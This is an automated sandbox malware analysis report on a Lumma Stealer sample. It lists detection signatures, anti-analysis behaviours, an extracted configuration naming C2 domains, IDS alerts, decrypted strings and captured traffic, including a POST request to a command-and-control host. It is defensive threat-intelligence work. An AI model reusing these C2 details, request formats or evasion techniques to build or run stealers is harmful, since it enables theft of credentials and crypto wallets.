Edit tour

Windows Analysis Report
Ebgl8jb6CW.exe

Overview

General Information

Sample name:	Ebgl8jb6CW.exe renamed because original name is a hash value
Original sample name:	f45c38f2402423aa924b4b40e8487483.exe
Analysis ID:	1580873
MD5:	f45c38f2402423aa924b4b40e8487483
SHA1:	ba3199c18bd15edb21d1bd571934f102bcb1bfac
SHA256:	5ad867b3e7d13f60980dc3b187ac6d2f26e89d2d0d5c8fb41c88067a4c421b35
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Ebgl8jb6CW.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\Ebgl8jb6CW.exe" MD5: F45C38F2402423AA924B4B40E8487483)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["curverpluch.lat", "slipperyloo.lat", "tentabatte.lat", "shapestickyr.lat", "observerfry.lat", "bashfulacid.lat", "wordyfindy.lat", "talkynicer.lat", "manyrestro.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:13.517620+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-26T12:45:16.046771+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-26T12:45:17.954017+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:16.802561+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:16.802561+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:11.617176+0100	2058480	1	Domain Observed Used for C2 Detected	192.168.2.4	50773	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:11.182870+0100	2058484	1	Domain Observed Used for C2 Detected	192.168.2.4	55293	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:10.432165+0100	2058492	1	Domain Observed Used for C2 Detected	192.168.2.4	57119	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:10.572419+0100	2058500	1	Domain Observed Used for C2 Detected	192.168.2.4	57713	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:10.271056+0100	2058502	1	Domain Observed Used for C2 Detected	192.168.2.4	61134	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:10.758491+0100	2058510	1	Domain Observed Used for C2 Detected	192.168.2.4	65502	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:11.330736+0100	2058512	1	Domain Observed Used for C2 Detected	192.168.2.4	53905	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:10.129763+0100	2058514	1	Domain Observed Used for C2 Detected	192.168.2.4	55755	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:14.317891+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Ebgl8jb6CW.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://manyrestro.lat:443/api	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/vo(A	Avira URL Cloud: Label: malware
Source: https://talkynicer.lat:443/apii	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/vo	Avira URL Cloud: Label: malware
Source: https://tentabatte.lat:443/api&	Avira URL Cloud: Label: malware

Found malware configuration

Source: Ebgl8jb6CW.exe.6808.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "slipperyloo.lat", "tentabatte.lat", "shapestickyr.lat", "observerfry.lat", "bashfulacid.lat", "wordyfindy.lat", "talkynicer.lat", "manyrestro.lat"], "Build id": "PsFKDg--pablo"}

Multi AV Scanner detection for submitted file

Source: Ebgl8jb6CW.exe	ReversingLabs: Detection: 52%
Source: Ebgl8jb6CW.exe	Virustotal: Detection: 51%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Ebgl8jb6CW.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: observerfry.lat
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp	String decryptor: PsFKDg--pablo

Source: Ebgl8jb6CW.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edx, ebx	0_2_00178600
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_001B1720
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	0_2_00178A50
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019C09E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019E0DA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov esi, ecx	0_2_001990D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019C0E6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0019D116
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019C09E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0019D17D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0019B170
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov eax, dword ptr [001B6130h]	0_2_00188169
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	0_2_001B1160
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_001981CC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_001A6210
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0018C300
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019D34A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_001B0340
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_001983D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_001773D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_001773D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov eax, ebx	0_2_00197440
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	0_2_00197440
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0018747D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov word ptr [edx], di	0_2_0018747D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	0_2_0019C465
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019C465
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00198528
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	0_2_0018B57D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edi, ecx	0_2_0019A5B6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_001B06F0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then jmp eax	0_2_00199739
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00197740
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	0_2_00179780
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then jmp edx	0_2_001937D6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then push esi	0_2_0017C805
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00192830
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	0_2_001AC830
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0019C850
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0018D8AC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0018D8AC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov eax, ebx	0_2_0018C8A0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	0_2_0018C8A0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	0_2_0018C8A0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	0_2_0018C8A0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0018D8D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0018D8D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edx, ecx	0_2_0018B8F6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edx, ecx	0_2_0018B8F6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_001AC990
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0019B980
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then jmp edx	0_2_001939B9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_001939B9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_001989E9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00191A10
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then dec edx	0_2_001AFA20
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	0_2_001ACA40
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0019AAC0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edx, ecx	0_2_00188B12
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then dec edx	0_2_001AFB10
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_0017AB40
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	0_2_0018EB80
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	0_2_0017CC7A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00184CA0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edx, ecx	0_2_00196D2E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	0_2_001B0D20
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then dec edx	0_2_001AFD70
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	0_2_001AEDC1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019DDFF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_001ACDF0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	0_2_001ACDF0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_001ACDF0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	0_2_001ACDF0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then dec edx	0_2_001AFE00
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0019DE07
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_00192E6D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then jmp edx	0_2_00192E6D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00192E6D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edx, ecx	0_2_00199E80
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	0_2_00172EB0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	0_2_00195F1B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov ecx, eax	0_2_0019BF13
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00186F52

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.4:57119 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.4:57713 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.4:55293 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.4:50773 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.4:61134 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.4:65502 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.4:55755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.4:53905 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: manyrestro.lat

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ h equals www.youtube.com (Youtube)
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=31525f9655e6db9516de0235; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; 